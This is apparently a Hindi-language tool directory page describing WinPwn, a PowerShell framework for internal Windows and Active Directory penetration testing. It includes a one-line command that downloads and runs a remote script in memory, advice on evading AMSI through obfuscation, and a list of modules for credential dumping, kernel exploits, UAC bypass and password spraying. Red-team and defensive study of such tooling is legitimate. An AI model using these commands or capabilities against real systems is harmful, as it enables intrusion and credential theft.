Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WinPwn — आंतरिक विंडोज़ Penetrationtest / AD-Security के लिए ऑटोमेशन | Kitploit
उपकरण/GitHubGitHub/s3cur3th1ssh1t/winpwn
भेद्यता परीक्षण फ्रेमवर्कविशेषाधिकार वृद्धिटोहीशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपोस्ट-शोषण में शीर्ष #17विशेषाधिकार वृद्धि में शीर्ष #5
3.7k535251 साल पहलेKitploit द्वारा समीक्षित
GitHub
s3cur3th1ssh1t/winpwn

WinPwn

आंतरिक विंडोज़ Penetrationtest / AD-Security के लिए ऑटोमेशन

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रायोजित द्वारा

     

WinPwn

पिछले कई आंतरिक पेनिट्रेशन टेस्ट में मुझे अक्सर मौजूदा Powershell Recon/Exploitation स्क्रिप्ट में प्रॉक्सी समर्थन की कमी के कारण समस्या होती थी। मैं अक्सर वर्तमान सिस्टम और/या डोमेन के बारे में जानकारी प्राप्त करने के लिए एक के बाद एक समान स्क्रिप्ट चलाता था। अधिक से अधिक आंतरिक पेनिट्रेशन टेस्ट प्रक्रियाओं (रिकॉननेसेंस और एक्सप्लॉइटेशन दोनों) को स्वचालित करने और प्रॉक्सी कारण से मैंने अपनी स्वचालित प्रॉक्सी पहचान और एकीकरण वाली स्क्रिप्ट लिखी। यह स्क्रिप्ट मुख्य रूप से प्रसिद्ध अन्य आक्रामक सुरक्षा Powershell परियोजनाओं पर आधारित है।

कोई भी सुझाव, फीडबैक, पुल रिक्वेस्ट और टिप्पणियाँ स्वागत हैं!

बस मॉड्यूल को इस प्रकार आयात करें:

Import-Module .\WinPwn.ps1 या iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

AMSI को बायपास करने के लिए किसी मौजूदा बायपास तकनीक का उपयोग करें, AMSI ट्रिगर ढूंढें और इसे बायपास फंक्शन में मैन्युअल रूप से बदलें या ट्रिगर स्ट्रिंग को एन्कोड करें। वैकल्पिक रूप से पूरी स्क्रिप्ट को अस्पष्ट करें।

यदि आप इंटरनेट एक्सेस के बिना विंडोज सिस्टम पर फंस गए हैं - कोई समस्या नहीं, बस Offline_Winpwn.ps1 का उपयोग करें, सबसे महत्वपूर्ण स्क्रिप्ट और एक्जीक्यूटेबल शामिल हैं।

आयात के बाद उपलब्ध कार्य:

  • WinPwn -> हमले चुनने के लिए मेनू:

alt text

  • Inveigh -> Inveigh को एक नई कंसोल विंडो में निष्पादित करता है, SMB-Relay हमले जिसमें सत्र प्रबंधन (Invoke-TheHash) शामिल है

  • SessionGopher -> SessionGopher को निष्पादित करता है, आपसे पैरामीटर मांगता है

  • Kittielocal ->

    • Obfuscated Invoke-Mimikatz संस्करण
    • मेमोरी में Safetykatz
    • rundll32 तकनीक का उपयोग करके lsass डंप करें
    • Obfuscated Lazagne डाउनलोड और चलाएं
    • ब्राउज़र क्रेडेंशियल डंप करें
    • अनुकूलित Mimikittenz संस्करण
    • वाई-फाई क्रेडेंशियल एक्सफिल्ट्रेट करें
    • SAM फ़ाइल NTLM हैश डंप करें
    • SharpCloud
  • Localreconmodules ->

    • इंस्टॉल किए गए सॉफ्टवेयर, कमजोर सॉफ्टवेयर, शेयर, नेटवर्क जानकारी, समूह, विशेषाधिकार और बहुत कुछ एकत्र करें
    • SMB-Signing, LLMNR Poisoning, MITM6, WSUS over HTTP जैसी सामान्य कमजोरियों की जांच करें
    • क्रेडेंशियल या अन्य संवेदनशील जानकारी के लिए Powershell इवेंट लॉग की जांच करें
    • ब्राउज़र क्रेडेंशियल और इतिहास एकत्र करें
    • रजिस्ट्री और फ़ाइल सिस्टम में पासवर्ड खोजें
    • संवेदनशील फ़ाइलें ढूंढें (कॉन्फ़िग फ़ाइलें, RDP फ़ाइलें, keepass डेटाबेस)
    • स्थानीय सिस्टम पर .NET बायनेरिज़ खोजें
    • वैकल्पिक: Get-Computerdetails (Powersploit) और PSRecon
  • Domainreconmodules ->

    • मैन्युअल समीक्षा के लिए विभिन्न डोमेन जानकारियाँ एकत्र करें
    • विवरण फ़ील्ड में AD पासवर्ड खोजें
    • संभावित संवेदनशील डोमेन शेयर फ़ाइलों की खोज करें
    • अप्रतिबंधित प्रतिनिधिमंडल सिस्टम/उपयोगकर्ता गणना की जाती है
    • Bloodhound रिपोर्ट जनरेट करें
    • डोमेन सिस्टम के लिए MS17-10 स्कैनर
    • डोमेन सिस्टम के लिए Bluekeep स्कैनर
    • SQL सर्वर खोज और ऑडिटिंग फंक्शन - PowerUpSQL
    • डोमेन कंट्रोलर या सभी सिस्टम के लिए MS-RPRN जांच
    • Grouper2 के साथ ग्रुप पॉलिसी ऑडिट
    • ADRecon के साथ CSV फ़ाइलों (या XLS यदि एक्सेल इंस्टॉल है) में AD रिपोर्ट जनरेट होती है
    • सामान्य कमजोरियों के लिए प्रिंटर की जांच करें
    • Resource-Based Constrained Delegation हमले के पथ खोजें
    • zerologon - CVE-2020-1472 के लिए सभी DC की जांच करें
    • और भी बहुत कुछ, बस एक नज़र डालें
  • Privescmodules

    • itm4ns Invoke-PrivescCheck
    • winPEAS
    • Powersploits PowerUp Allchecks, Sherlock, GPPPasswords
    • Dll Hijacking, फ़ाइल अनुमतियाँ, रजिस्ट्री अनुमतियाँ और कमज़ोर कुंजियाँ, Rotten/Juicy Potato जांच
  • kernelexploits ->

    • MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) केवल x86!
    • MS16-032 - (2008/7/8/10/2012)!
    • MS16-135 - (केवल WS2k16)!
    • CVE-2018-8120 - मई 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
    • CVE-2019-0841 - अप्रैल 2019!
    • CVE-2019-1069 - Polarbear Hardlink, क्रेडेंशियल आवश्यक - जून 2019!
    • CVE-2019-1129/1130 - रेस कंडीशन, कई कोर आवश्यक - जुलाई 2019!
    • CVE-2019-1215 - सितंबर 2019 - केवल x64!
    • CVE-2020-0638 - फरवरी 2020 - केवल x64!
    • CVE-2020-0796 - SMBGhost
    • CVE-2020-0787 - मार्च 2020 - सभी विंडोज संस्करण
    • CVE-2021-34527/CVE-2021-1675 - जून 2021 - PrintNightmare
    • CVE-2021-40449 - CallbackHell - अक्टूबर 2021
    • Juicy-Potato Exploit
    • itm4ns Printspoofer
  • UACBypass ->

    • UAC Magic, James Forshaw के UAC पर तीन भागों की पोस्ट पर आधारित
    • UAC बायपास cmstp तकनीक, Oddvar Moe द्वारा
    • DiskCleanup UAC बायपास, James Forshaw द्वारा
    • DccwBypassUAC तकनीक, Ernesto Fernandez और Thomas Vanhoutte द्वारा
  • SYSTEMShell ->

    • CreateProcess का उपयोग करके सिस्टम शेल प्राप्त करें
    • NamedPipe Impersonation का उपयोग करके सिस्टम शेल प्राप्त करें
    • Token Manipulation का उपयोग करके सिस्टम शेल प्राप्त करें
    • UsoClient DLL लोड या CreateProcess का उपयोग करके बाइंड सिस्टम शेल
  • Shareenumeration -> Invoke-Filefinder और Invoke-Sharefinder (Powerview / Powersploit)

  • Domainshares -> सभी डोमेन सिस्टम पर Snaffler या Passhunt खोज

  • Groupsearch -> Get-DomainGPOUserLocalGroupMapping - ग्रुप पॉलिसी मैपिंग (Powerview / Powersploit) के माध्यम से उन सिस्टमों को ढूंढें जहां आपके पास व्यवस्थापक-पहुंच या RDP पहुंच है

  • Kerberoasting -> एक नई विंडो में Invoke-Kerberoast निष्पादित करता है और बाद में क्रैक करने के लिए हैश संग्रहीत करता है

  • PowerSQL -> SQL सर्वर खोज, वर्तमान उपयोगकर्ता के साथ पहुंच की जांच करें, डिफ़ॉल्ट क्रेडेंशियल + UNCPath इंजेक्शन हमलों के लिए ऑडिट

  • Sharphound -> Bloodhound 3.0 रिपोर्ट

  • Adidnsmenu -> Active Directory-इंटीग्रेटेड DNS नोड बनाएं या हटाएं

  • MS17-10 -> डोमेन या सभी सिस्टम में सक्रिय विंडोज सर्वर को MS17-10 (Eternalblue) कमजोरी के लिए स्कैन करें

  • Sharpcradle -> रिमोट वेबसर्वर से C# फ़ाइलें RAM में लोड करें

  • DomainPassSpray -> DomainPasswordSpray हमले, सभी डोमेन उपयोगकर्ताओं के लिए एक पासवर्ड

  • Bluekeep -> डोमेन सिस्टम के लिए Bluekeep स्कैनर

पैरामीटर के बिना, अधिकांश फंक्शन केवल इंटरैक्टिव शेल से उपयोग किए जा सकते हैं। इसलिए मैंने पैरामीटर -noninteractive और -consoleoutput जोड़ने का निर्णय लिया ताकि स्क्रिप्ट को एक अतुल्यकालिक C2-फ्रेमवर्क जैसे Empire, Covenant, Cobalt Strike या अन्य से उपयोग किया जा सके। इसके अतिरिक्त, -repo पैरामीटर जोड़ा गया था ताकि WinPwn को स्थानीय रिपॉजिटरी से इसकी सभी सुविधाओं के साथ उपयोग किया जा सके। इनका उपयोग निम्नानुसार किया जा सकता है:

उपयोग:

-noninteractive -> कार्यों के लिए कोई प्रश्न नहीं, ताकि वे पूर्वनिर्धारित या उपयोगकर्ता द्वारा परिभाषित पैरामीटर के साथ चलें

-consoleoutput -> लूट/रिपोर्ट फ़ोल्डर नहीं बनाए जाते। प्रत्येक कार्य आउटपुट कंसोल पर लौटाता है ताकि आप अपने C2-फ्रेमवर्क के एजेंट लॉग में सब कुछ देख सकें उदाहरण:

WinPwn -noninteractive -consoleoutput -DomainRecon -> यह प्रत्येक एकल डोमेन रिकॉन स्क्रिप्ट और फंक्शन लौटाएगा और संभवतः आपको बहुत अधिक आउटपुट देगा

WinPwn -noninteractive -consoleoutput -Localrecon -> यह स्थानीय सिस्टम के लिए अधिकतम जानकारी एकत्र करेगा

Generalrecon -noninteractive -> बुनियादी स्थानीय रिकॉन फंक्शन निष्पादित करें और आउटपुट को संबंधित फ़ोल्डरों में संग्रहीत करें

टूल डाउनलोड करें